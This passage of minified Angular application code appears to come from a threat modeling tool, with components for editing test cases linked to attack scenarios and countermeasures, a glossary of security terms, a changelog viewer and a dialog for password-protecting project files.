"),m(95,"div",22),s(96,"\n "),m(97,"div",23),s(98,"\n "),m(99,"mat-list",24),s(100,"\n "),ne(101,MPe,15,15,"mat-list-item",25),s(102,"\n "),u(),s(103,"\n "),m(104,"mat-menu",null,26),s(106,"\n "),ne(107,TPe,7,9,"ng-template",27),s(108," \n "),u(),s(109,"\n "),m(110,"mat-menu",null,28),s(112,"\n "),ne(113,DPe,3,1,"ng-template",27),s(114," \n "),u(),s(115,"\n "),m(116,"mat-menu",null,29),s(118,"\n "),ne(119,wPe,3,1,"ng-template",27),s(120," \n "),u(),s(121,"\n "),u(),s(122,"\n "),m(123,"div",30),s(124,"\n "),ne(125,RPe,10,1,"ng-container",0),s(126,"\n "),u(),s(127,"\n "),u(),s(128,"\n "),u(),s(129,"\n"),u()}if(2&t){const e=V();g(5),ke(re(6,48,"general.Name")),g(3),at("matTooltip",e.testCase.Name),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Name),g(3),F("ngIf",e.testCase.Name),g(6),ke(re(18,50,"general.Number")),g(3),at("matTooltip",e.testCase.Number),F("ngModel",e.testCase.Number),g(2),F("ngIf",e.testCase.CheckUniqueNumber()),g(8),ke(re(31,52,"properties.Status")),g(3),at("matTooltip",re(34,54,e.GetTestCaseStateName(e.testCase.Status))),F("value",e.testCase.Status),g(3),F("ngForOf",e.GetTestCaseStates()),g(4),at("matTooltip",re(41,56,"pages.modeling.diagram.addAttackScenario")),F("disabled",!e.canAddAttackScenario),g(10),ke(re(51,58,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Description),g(8),ke(re(62,60,"pages.modeling.testcase.verison")),g(3),at("matTooltip",e.testCase.Version),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Version),g(4),ct("\n ",re(69,62,"properties.PreConditions"),":\n "),g(2),F("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.PreConditions),g(1),ct("\n ",re(72,64,"properties.Steps"),":\n "),g(2),F("showTimestamp",!1)("hasCheckbox",!1)("enumerateItems",!0)("strings",e.testCase.Steps),g(1),ct("\n ",re(75,66,"properties.TestData"),":\n "),g(2),F("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.TestData),g(1),ct("\n ",re(78,68,"properties.Summary"),":\n "),g(2),F("showTimestamp",!0)("hasCheckbox",!1)("notes",e.testCase.Summary),g(1),ct("\n ",re(81,70,"general.Images"),":\n "),g(2),at("matTooltip",re(83,72,"general.Add")),g(10),F("ngForOf",e.testCase.Images),g(7),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(2),F("ngForOf",e.linkLists),g(24),F("ngIf",e.selectedLinks)}}let gM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.dataService=n,this.theme=r,this.dialog=c,this.router=d,this.activatedRoute=T,this.linkLists=[],this.selectedLinks=null,this.searchString="",this.groups={},e&&(this.testCase=e),i&&i.subscribe(k=>this.testCase=k)}get testCase(){return this._testCase}set testCase(e){this._testCase=e,this.selectedLinks=null,this.RefreshLinks()}get canAddAttackScenario(){return this.testCase.LinkedElements.length>0}ngOnInit(){this.RefreshLinks()}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}RefreshLinks(e=null){this.linkLists=[],this.linkLists.push({Key:"properties.LinkedElements",Value:this.testCase.LinkedElements}),this.linkLists.push({Key:"properties.LinkedScenarios",Value:this.testCase.LinkedScenarios}),this.linkLists.push({Key:"properties.LinkedMeasures",Value:this.testCase.LinkedMeasures}),e&&(this.selectedLinks=this.linkLists.find(i=>i.Key===e)),this.groups={}}AddAttackScenario(){const e=this.testCase.LinkedElements[0],i=this.GetItemView(e),n=this.dataService.Project.CreateAttackScenario(i.ID,!1);n.SetMapping("",[],e,[e],null,null,null,null),n.IsGenerated=!1,n.Name=this.testCase.Name,n.Description=this.testCase.Description,this.dialog.OpenAttackScenarioDialog(n,!0).subscribe(r=>{r?(this.testCase.AddLinkedAttackScenario(n),this.RefreshLinks()):this.dataService.Project.DeleteAttackScenario(n)})}AddLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.AddLinkedElement(e):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.AddLinkedAttackScenario(e):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.AddLinkedCountermeasure(e),this.RefreshLinks(this.selectedLinks.Key)}RemoveLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.RemoveLinkedElement(e.ID):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.RemoveLinkedAttackScenario(e.ID):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.RemoveLinkedCountermeasure(e.ID),this.RefreshLinks(this.selectedLinks.Key)}OnItemClick(e){if(e instanceof Np){const i={viewID:this.GetItemView(e).ID,elementID:e.ID};this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:i,replaceUrl:!0})}else e instanceof Rc?this.dialog.OpenAttackScenarioDialog(e,!1):e instanceof Jl&&this.dialog.OpenCountermeasureDialog(e,!1,[])}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:1920,useWebWorker:!0};try{const n=yield(0,WG.Z)(e.target.files[0],i),r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.testCase.Images=[...this.testCase.Images,c.target.result.toString()]}}catch(n){console.log(n)}}})}DeleteImage(e){const i=this.testCase.Images.indexOf(e);i>=0&&this.testCase.Images.splice(i,1)}ViewImage(e){this.dialog.OpenViewImageDialog(e)}GetItemView(e){return e instanceof Np?this.testCase.GetViewOfLinkedElement(e):e instanceof Rc||e instanceof Jl?this.dataService.Project.GetView(e.ViewID):void 0}GetMenuGroups(e){if(null==this.groups[e.Key]){this.groups[e.Key]=[];const i=[];this.dataService.Project.GetDevices().forEach(n=>{i.push(n.HardwareDiagram),n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),this.dataService.Project.GetMobileApps().forEach(n=>{n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),i.push(...this.dataService.Project.GetDFDiagrams()),"properties.LinkedElements"===e.Key?i.forEach(n=>{let r;n instanceof ns?r=n.Elements.GetChildrenFlat():n instanceof Om&&(r=n.GetChildrenFlat()),r&&(r=r.filter(c=>!this.testCase.LinkedElements.includes(c)),r.length>0&&this.groups[e.Key].push({Key:n,Value:r}))}):"properties.LinkedScenarios"===e.Key?i.forEach(n=>{const r=this.dataService.Project.GetAttackScenariosApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedScenarios.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})}):"properties.LinkedMeasures"===e.Key&&i.forEach(n=>{const r=this.dataService.Project.GetCountermeasuresApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedMeasures.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})})}return this.groups[e.Key]}GetTestCaseStates(){return Qg.GetKeys()}GetTestCaseStateName(e){return Qg.ToString(e)}GetFilteredList(e){return e.flatMap(i=>i.Value).filter(i=>i.Name.toLowerCase().includes(this.searchString.toLowerCase()))}OnSearchBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee($g,8),Ee(Tt,8),Ee(Yi),Ee(Oa),Ee(Wn),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-test-case"]],viewQuery:function(e,i){if(1&e&&(Mi(fPe,5),Mi(pPe,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{testCase:"testCase"},decls:1,vars:1,consts:[[4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"disabled","matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","strings"],[3,"showTimestamp","hasCheckbox","enumerateItems","strings"],[3,"showTimestamp","hasCheckbox","notes"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],[2,"overflow","auto"],["class","imgContainer",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],["addMenu","matMenu"],["matMenuContent",""],["itemMenu","matMenu"],["filteredList","matMenu"],[1,"column2"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[1,"imgContainer"],[3,"src","click"],["projImg",""],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","matMenuTriggerData","placeholder","ngModelChange","click"],["searchBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",2,"font-size","small !important",3,"click"]],template:function(e,i){1&e&&ne(0,SPe,130,74,"div",0),2&e&&F("ngIf",i.testCase)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.imgContainer[_ngcontent-%COMP%]{position:relative;float:left;margin-right:10px}.imgContainer[_ngcontent-%COMP%] img[_ngcontent-%COMP%]{max-height:100px;height:auto}.imgContainer[_ngcontent-%COMP%] .removeBtn[_ngcontent-%COMP%]{position:absolute;left:0;top:0}.imgContainer[_ngcontent-%COMP%] .removeBtn[_ngcontent-%COMP%] button[_ngcontent-%COMP%]{width:20px;height:20px}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})(),kPe=(()=>{class t{constructor(e){e&&(this.image=e.Value)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(E2,8))},t.\u0275cmp=Wt({type:t,selectors:[["app-image-view"]],inputs:{image:"image"},decls:1,vars:1,consts:[[2,"width","100%","height","100%",3,"src"]],template:function(e,i){1&e&&it(0,"img",0),2&e&&F("src",i.image,nm)}}),t})();const PPe=["termsImg"];function OPe(t,a){1&t&&(m(0,"span"),s(1," | "),u())}function NPe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",4),he("click",function(){const r=be(e).$implicit;return Me(V().ScrollTo(r))}),s(3),u(),s(4,"\n "),ne(5,OPe,2,0,"span",5),s(6,"\n "),Mt()}if(2&t){const e=a.$implicit,i=a.last,n=V();g(2),ri("color",n.theme.IsDarkMode?"white":"black"),Ct("primary-color",null!=n.glossary[e]),g(1),ke(e),g(2),F("ngIf",!i)}}function LPe(t,a){if(1&t&&(m(0,"p")(1,"strong"),s(2),u(),s(3),u()),2&t){const e=a.$implicit;g(2),ct("",e.name,":"),g(1),ct(" ",e.description,"")}}function zPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n "),m(2,"h3"),s(3),u(),s(4,"\n "),ne(5,LPe,4,2,"p",2),s(6,"\n "),u()),2&t){const e=V().$implicit,i=V();g(3),ke(e),g(2),F("ngForOf",i.glossary[e])}}function WPe(t,a){if(1&t&&(bt(0),s(1,"\n "),ne(2,zPe,7,2,"div",5),s(3,"\n "),Mt()),2&t){const e=a.$implicit,i=V();g(2),F("ngIf",i.glossary[e])}}const FPe=["Asset","AttackScenario","AttackVector","Countermeasure","IoT-Device","Mitigation","MitigationProcess","Risk","RiskAssessment","SystemThreat","Threat","ThreatAnalysis","ThreatModeling","ThreatSource","Vulnerability","Weakness"];let VPe=(()=>{class t{constructor(e,i,n){this.theme=e,this.dialog=i,this.translate=n,this.alphabet=[],this.glossary={},this.termsImageSrc="./assets/Terms_en.png"}ngOnInit(){for(let e=0;e<26;e++)this.alphabet.push(String.fromCharCode("A".charCodeAt(0)+e));FPe.forEach(e=>{const i={name:this.translate.instant("glossary."+e+".n"),description:this.translate.instant("glossary."+e+".d")};null==this.glossary[i.name[0]]&&(this.glossary[i.name[0]]=[]),this.glossary[i.name[0]].push(i)}),"de"===this.translate.currentLang&&(this.termsImageSrc=this.termsImageSrc.replace("_en","_de"))}ScrollTo(e){const n=Array.from(document.getElementsByTagName("h3")).find(r=>r.textContent==e);n&&n.scrollIntoView()}ViewImage(){this.dialog.OpenViewImageDialog(this.termsImage.nativeElement.src,"1200px")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-glossary"]],viewQuery:function(e,i){if(1&e&&Mi(PPe,5),2&e){let n;Vt(n=Bt())&&(i.termsImage=n.first)}},decls:12,vars:3,consts:[[2,"width","800px",3,"src","click"],["termsImg",""],[4,"ngFor","ngForOf"],[2,"overflow","auto","width","800px"],[1,"buttonAsText",3,"click"],[4,"ngIf"]],template:function(e,i){1&e&&(m(0,"img",0,1),he("click",function(){return i.ViewImage()}),u(),s(2,"\n"),m(3,"div"),s(4,"\n "),ne(5,NPe,7,6,"ng-container",2),s(6,"\n"),u(),s(7,"\n"),m(8,"div",3),s(9,"\n "),ne(10,WPe,4,1,"ng-container",2),s(11,"\n"),u()),2&e&&(F("src",i.termsImageSrc,nm),g(5),F("ngForOf",i.alphabet),g(5),F("ngForOf",i.alphabet))},dependencies:[Zi,Ri],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();const uf_i="0.4.22";function BPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;g(1),ke(e)}}function HPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n "),m(2,"h3"),s(3),u(),s(4,"\n "),m(5,"ul"),s(6,"\n "),ne(7,BPe,2,1,"li",4),s(8,"\n "),u(),s(9,"\n "),u()),2&t){const e=a.$implicit,i=V();ri("opacity",i.IsNewerVersion(e.Key)?.5:1),g(2),Ct("color-primary",e.Key==i.Version),g(1),ke(e.Key),g(4),F("ngForOf",e.Value)}}let UPe=(()=>{class t{constructor(e){this.http=e,this.Version=uf_i,this.Versions=[]}ngOnInit(){this.http.get("https://raw.githubusercontent.com/SecSimon/TTM/main/CHANGELOG.md",{responseType:"text"}).subscribe(e=>{try{let i=null;e.split("\n").forEach(n=>{n.startsWith("#")?(i=n.replace(/#/g,"").trim(),this.Versions.push({Key:i,Value:[]})):i&&n.startsWith("*")&&this.Versions[this.Versions.length-1].Value.push(n.replace("*","").trim())})}catch(i){}})}IsNewerVersion(e){const i=this.Version.replace("v","").split("."),n=e.replace("v","").split(".");if(i.length==n.length)for(let r=0;rNumber(i[r]))return!0;if(Number(n[r]){class t{constructor(e){this.dataService=e}ngOnInit(){this.Project=this.dataService.Project}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-tasks"]],decls:22,vars:16,consts:[["matInput",""],[2,"margin-top","0px"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"]],template:function(e,i){1&e&&(m(0,"mat-form-field"),s(1,"\n "),it(2,"input",0),s(3,"\n"),u(),s(4,"\n"),m(5,"div"),s(6,"\n "),m(7,"h4",1),s(8),oe(9,"translate"),u(),s(10,"\n "),it(11,"app-notes",2),s(12,"\n"),u(),s(13,"\n"),m(14,"div"),s(15,"\n "),m(16,"h4"),s(17),oe(18,"translate"),u(),s(19,"\n "),it(20,"app-notes",3),s(21,"\n"),u()),2&e&&(Ct("cdk-visually-hidden",!0),g(8),ke(re(9,12,"general.Tasks")),g(3),F("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.Project.Tasks),g(6),ke(re(18,14,"general.Notes")),g(3),F("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.Project.Notes))}}),t})();function qPe(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n "),Mt()),2&t&&(g(3),ke(re(4,1,"dialog.modelchanges.noChanges")))}function GPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;g(1),ke(e)}}function jPe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"ul"),s(7,"\n "),ne(8,GPe,2,1,"li",1),s(9,"\n "),u(),s(10,"\n "),Mt()),2&t){const e=V(2);g(3),ct("",re(4,2,"dialog.modelchanges.incompleteList"),":"),g(5),F("ngForOf",e.Changes)}}function QPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n "),ne(2,qPe,6,3,"ng-container",0),s(3,"\n "),ne(4,jPe,11,4,"ng-container",0),s(5,"\n"),u()),2&t){const e=V();g(2),F("ngIf",!e.dataService.Project.FileChanged),g(2),F("ngIf",e.dataService.Project.FileChanged)}}let UG=(()=>{class t{constructor(e,i){this.dataService=e,this.translate=i,this.Changes=[]}ngOnInit(){this.UpdateChanges()}UpdateChanges(){this.Changes=[],this.dataService.Project&&this.dataService.Project.GetLog().forEach(e=>{let i=e.Title;i.includes(".")||(i=this.translate.instant("general."+e.Title),i.includes("general.")&&(i=this.translate.instant("properties."+e.Title)),i.includes("properties.")&&(i=Gi.FromCamelCase(e.Title)));let n=Gi.Format(this.translate.instant("messages.changes."+e.Type.toString()),this.translate.instant(i));e.Name&&(n+=": "+e.Name),this.Changes.push(n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-changes"]],decls:1,vars:1,consts:[[4,"ngIf"],[4,"ngFor","ngForOf"]],template:function(e,i){1&e&&ne(0,QPe,6,2,"div",0),2&e&&F("ngIf",i.dataService.Project)},dependencies:[Zi,Ri,Xi]}),t})();function $Pe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(g(1),ke(re(2,1,"status-bar.passwordProtectionOn")))}function KPe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(g(1),ke(re(2,1,"status-bar.passwordProtectionOff")))}function XPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-checkbox",7),he("ngModelChange",function(n){return be(e),Me(V().RemovePassword=n)}),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"br"),s(7,"\n "),m(8,"mat-form-field",8),s(9,"\n "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n "),m(14,"input",9),he("ngModelChange",function(n){return be(e),Me(V().ChangePassword=n)}),u(),s(15,"\n "),m(16,"mat-icon",10),he("click",function(){be(e);const n=V();return Me(n.ShowChangePassword=!n.ShowChangePassword)}),s(17),u(),s(18,"\n "),m(19,"mat-icon",11),oe(20,"translate"),s(21,"privacy_tip"),u(),s(22,"\n "),u(),s(23,"\n "),u()}if(2&t){const e=V();g(2),F("ngModel",e.RemovePassword),g(1),ke(re(4,8,"dialog.save.removePW")),g(8),ke(re(12,10,"dialog.passswordprotection.NewPasword")),g(3),F("disabled",e.RemovePassword)("type",e.ShowChangePassword?"text":"password")("ngModel",e.ChangePassword),g(3),ke(e.ShowChangePassword?"visibility_off":"visibility"),g(2),at("matTooltip",re(20,12,"dialog.save.security"))}}function YPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",8),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",12),he("ngModelChange",function(n){return be(e),Me(V().NewPassword=n)}),u(),s(9,"\n "),m(10,"mat-icon",10),he("click",function(){be(e);const n=V();return Me(n.ShowNewPassword=!n.ShowNewPassword)}),s(11),u(),s(12,"\n "),m(13,"mat-icon",11),oe(14,"translate"),s(15,"privacy_tip"),u(),s(16,"\n "),u(),s(17,"\n "),u()}if(2&t){const e=V();g(5),ke(re(6,5,"dialog.save.addPW")),g(3),F("type",e.ShowNewPassword?"text":"password")("ngModel",e.NewPassword),g(3),ke(e.ShowNewPassword?"visibility_off":"visibility"),g(2),at("matTooltip",re(14,7,"dialog.save.security"))}}let JPe=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.dataService=i,this.messageService=n}get HasChanges(){return this.IsEncrypted?this.RemovePassword||!Gi.NullOrEmpty(this.ChangePassword):!Gi.NullOrEmpty(this.NewPassword)}ngOnInit(){this.initalizeProperties()}Change(){this.IsEncrypted?this.RemovePassword?this.dataService.RemovePassword():this.dataService.SetPassword(this.ChangePassword):this.dataService.SetPassword(this.NewPassword),this.messageService.Info("messages.info.changesActiveAfterSaving"),this.initalizeProperties()}initalizeProperties(){this.IsEncrypted=this.dataService.SelectedFile.isEncrypted,this.RemovePassword=!1,this.NewPassword="",this.ShowNewPassword=!1,this.ChangePassword="",this.ShowChangePassword=!1}}return t.\u0275fac=function(e){return 